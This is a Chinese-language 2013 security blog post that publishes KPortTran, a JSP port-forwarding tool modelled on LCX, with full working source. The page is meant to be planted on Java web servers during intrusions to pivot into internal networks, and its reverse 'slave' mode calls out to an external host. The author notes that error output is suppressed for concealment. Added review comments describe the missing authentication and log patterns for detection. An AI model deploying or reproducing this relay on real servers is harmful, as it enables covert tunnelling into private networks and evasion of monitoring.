
JSP版LCX:端口转发工具 KPORTTRAN

October 26, 2013 • Security

渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。

参数

xxx.com/KPortTran.jsp?
lip = local ip / 本地ip //一般为内网主机IP
lp = local port / 本地端口 //一般为内网主机端口
rip = remote ip / 远程ip //一般为外网连接者IP,或者内网其他主机
rp = remote port / 远程端口 //一般为外网连接者端口
lp2 = local port2 / 本地端口2 //本地监听转发时的第二个端口
m = mode / 运行模式 //合法的值有:listen tran slave三种

运行模式

m = listen
需要参数:lp、lp2
该模式下,会在本地监听两个端口,相互转发数据
m = tran
需要参数:lip、lp、rip、rp
该模式为正向转发,会在本地的lip上监听lp端口,当有连接建立时,再连接rip的rp端口,并将lip的lp上接收到的数据发向rip主机的rp端口。
m = slave
需要的参数: lip、lp、rip、rp
该模式为反向转发,会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据,可用于内网反连。

注意事项:

某些server上使用时,可能由于编码问题会报错,请根据实际情况,更改代码首行的编码设置。
为了隐蔽,没有设置错误信息返回。如果不能执行,请检查一下参数。

测试截图:

listen.png

tran.png

slave.png

源码

<%@page pageEncoding="GBK"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.net.*"%>
<%
/*code by KingX*/
/**
 * TCP relay declared as a local class inside the JSP scriptlet.
 *
 * <p>Three entry points ({@link #listen}, {@link #slave}, {@link #tran}) pair up
 * sockets and hand each pair to two {@code tranThread} instances, one per
 * direction, so bytes read from one socket are written to the other.
 *
 * <p>NOTE(review): nothing in this class authenticates the caller or restricts
 * which addresses and ports may be bound or dialled. Worker threads are started
 * and never joined or tracked, and the relay loops have no exit condition other
 * than an exception, so sockets and threads created here are not released when
 * the HTTP request ends. From a monitoring point of view the visible effects
 * are a servlet container process that holds listening sockets it was not
 * configured with and/or opens outbound connections that no application code
 * accounts for.
 */
class KPortTran {
    /**
     * Opens two listening sockets and cross-connects the connections accepted
     * on them. This method does not return while the accept loop is running,
     * so the calling request thread stays blocked.
     *
     * @param port1 decimal port number for the first listener
     * @param port2 decimal port number for the second listener
     */
    public void listen(String port1, String port2) {
        ServerSocket listenServerSocket = null;
        ServerSocket outServerSocket = null;
        try {
            // No bind address is given, so both listeners use the default (wildcard) address.
            listenServerSocket = new ServerSocket(Integer.parseInt(port1));
            outServerSocket = new ServerSocket(Integer.parseInt(port2));
        } catch (NumberFormatException e) {
            // Swallowed: a non-numeric port leaves one or both listeners null.
        } catch (IOException e) {
            // Swallowed: a bind failure (e.g. port in use) leaves one or both listeners null.
        }
        Socket listenSocket = null;
        Socket outSocket = null;
        try {
            while (true) {  
                // Blocks for one connection on the first port, then one on the second;
                // the two are paired in that order.
                listenSocket = listenServerSocket.accept();
                outSocket = outServerSocket.accept();
                // One pump thread per direction.
                new tranThread(outSocket, listenSocket).start();
                new tranThread(listenSocket, outSocket).start();
                Thread.sleep(200);
            }
        } catch (Exception e) { 
            // Swallowed. This also hides the NullPointerException raised when a listener
            // above failed to open. NOTE(review): neither ServerSocket is closed on exit.
      }
    }
 
    /**
     * Starts a {@code Server} thread in reverse mode: it dials out to both
     * endpoints and relays between them.
     *
     * <p>Note the argument mapping: the Server is built with
     * {@code (srcIP, port2)} as its first endpoint and {@code (targetIP, port1)}
     * as its second.
     *
     * @param targetIP host name or address of the second endpoint
     * @param port1    decimal port of the second endpoint
     * @param srcIP    host name or address of the first endpoint
     * @param port2    decimal port of the first endpoint
     * @throws IOException if either host name cannot be resolved
     *         ({@code UnknownHostException}); a non-numeric port raises an
     *         unchecked {@code NumberFormatException}
     */
    public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {
        InetAddress src = InetAddress.getByName(srcIP);
        InetAddress dest = InetAddress.getByName(targetIP);
        int p1 = Integer.parseInt(port1);
        int p2 = Integer.parseInt(port2);
        // The constructor starts the thread itself; the reference is not kept.
        new Server(src, p2, dest, p1, true);
    }
 
    /**
     * Starts a {@code Server} thread in forward mode: it listens on
     * {@code srcIP:port1} and, for every accepted connection, dials
     * {@code targetIP:port2} and relays between the two.
     *
     * @param srcIP    local address to bind the listener to
     * @param port1    decimal port to listen on
     * @param targetIP host name or address to connect to
     * @param port2    decimal port to connect to
     * @throws NumberFormatException if a port string is not a valid integer
     * @throws IOException if either host name cannot be resolved
     */
    public void tran(String srcIP, String port1, String targetIP, String port2)
            throws NumberFormatException, IOException {
        InetAddress src = InetAddress.getByName(srcIP);
        InetAddress dest = InetAddress.getByName(targetIP);
        int p1 = Integer.parseInt(port1);
        int p2 = Integer.parseInt(port2);
        // The constructor starts the thread itself; the reference is not kept.
        new Server(src, p1, dest, p2, false);
    }
/**
 * One-directional byte pump: copies everything read from {@code in} to
 * {@code out} until end of stream, an I/O error, or either socket is closed.
 * A full-duplex relay uses two instances with the sockets swapped.
 */
class tranThread extends Thread {
    // Socket being read from and socket being written to.
    Socket in;
    Socket out;
    // Cached streams of the two sockets above.
    InputStream is;
    OutputStream os;
    /**
     * @param in  socket to read from
     * @param out socket to write to
     * @throws IOException if either stream cannot be obtained
     */
    public tranThread(Socket in, Socket out) throws IOException {
        this.is = in.getInputStream();
        this.os = out.getOutputStream();
        this.in = in;
        this.out = out;
    }
 
    /**
     * Closes both streams and both sockets. Because both sockets are closed,
     * the pump running in the opposite direction on the same pair ends too.
     * NOTE(review): all four calls share one try block, so the first close()
     * that throws skips the remaining ones.
     */
    private void closeSocket() {
        try {
            is.close();
            os.close();
            in.close();
            out.close();
        } catch (IOException e) {
            // Swallowed.
        }
    }
    @Override
    public void run() {
        super.run();
        byte[] buffer = new byte[4096];
        int len = -1;
        try {
            while (true) {
                // The read only happens when neither socket is already marked closed;
                // -1 from read() means the peer finished sending.
                if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {
                    break;
                } else {
                    os.write(buffer, 0, len);
                    os.flush(); 
                }
            }
        } catch (IOException e) {
            // The finally block below runs as well, so closeSocket() is invoked twice on this path.
            closeSocket();
        } finally {
            closeSocket();
        }
    }
}
 
 
/**
 * Relay driver thread. In reverse mode it makes two outbound connections and
 * joins them; otherwise it listens on one endpoint and connects to the other
 * for each accepted client. The thread is started from the constructor.
 */
class Server extends Thread {
    // First endpoint (address + p1) and second endpoint (address + p2).
    InetAddress src;
    InetAddress dest;
    int p1, p2;
    // true: dial out to both endpoints; false: listen on src:p1 and dial dest:p2.
    boolean reverse = false;
     
    /**
     * Stores the endpoints and immediately starts the thread.
     *
     * @param srcIP      address of the first endpoint
     * @param srcPort    port of the first endpoint
     * @param targetIP   address of the second endpoint
     * @param targetPort port of the second endpoint
     * @param flag       {@code true} for reverse mode, {@code false} for forward mode
     */
    public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,
            int targetPort, boolean flag) {
        this.src = srcIP;
        this.dest = targetIP;
        this.p1 = srcPort;
        this.p2 = targetPort;
        this.reverse = flag;
        // All fields are assigned before start(), so run() sees them initialised.
        start();
    }
 
    @Override
    public void run() {
        super.run();
        if (reverse) {
            try {
                // Outbound connections to both endpoints, pumped in both directions.
                Socket s = new Socket(src, p1);
                Socket s2 = new Socket(dest, p2);
                new tranThread(s, s2).start();
                new tranThread(s2, s).start();
 
                // Poll once per second and re-establish the pair when a socket has been closed.
                while (true) {
                    if (s2.isClosed() || s.isClosed()) {
                        if (s2.isClosed()) {
                            s2 = new Socket(dest, p2);
                        }
                        if (s.isClosed()) {
                            s = new Socket(src, p1);
                        }
                        new tranThread(s, s2).start();
                        new tranThread(s2, s).start();
                    }
                    Thread.sleep(1000);
                }
            } catch (IOException e) {
                // Swallowed: a failed connect or reconnect ends this thread with no trace.
            } catch (InterruptedException e) {
                // Swallowed: the interrupt status is not restored.
            }
 
        } else {
            ServerSocket ss;
            try {
                // Backlog of 5, bound to the src address only.
                ss = new ServerSocket(p1, 5, src);
 
                while (true) {
                    Socket s = ss.accept();
                    // A fresh outbound connection per accepted client.
                    // NOTE(review): if this connect fails, the exception leaves the loop and
                    // neither s nor ss is closed.
                    Socket s2 = new Socket(dest, p2);
                    new tranThread(s, s2).start();
                    new tranThread(s2, s).start();
                }
            } catch (IOException e) {
                // The only failure path in this class that leaves a trace (stack trace on stderr).
                e.printStackTrace();
            }
        }
    }
}
}
%>
<%
// Request-driven dispatch: six parameters select the relay mode and its endpoints.
// NOTE(review): the values are handed to KPortTran exactly as received. There is no
// authentication, no allow-list of hosts or ports, and no validation here, so any
// client that can reach this page decides what the server process binds or connects
// to. Requests to a JSP carrying the m / lip / lp / rip / rp / lp2 parameters are
// therefore a useful pattern to look for in request logs.
final String lip = request.getParameter("lip");
final String lp = request.getParameter("lp");
final String lp2 = request.getParameter("lp2");
final String rip = request.getParameter("rip");
final String rp = request.getParameter("rp");
final String m = request.getParameter("m");

KPortTran relay = new KPortTran();
// getParameter returns null for a missing "m", in which case the first equals() call
// throws NullPointerException and the request fails. Exceptions declared by tran()
// and slave() also propagate out of the scriptlet to the container.
if (m.equals("tran")) {
    // Forward mode: listen on lip:lp, connect to rip:rp.
    relay.tran(lip, lp, rip, rp);
} else if (m.equals("slave")) {
    // Reverse mode: connect out to both lip:lp and rip:rp.
    relay.slave(lip, lp, rip, rp);
} else if (m.equals("listen")) {
    // Listen mode: accept on lp and lp2; this call blocks the request thread.
    relay.listen(lp, lp2);
}
%>
Tags: JSP版LCX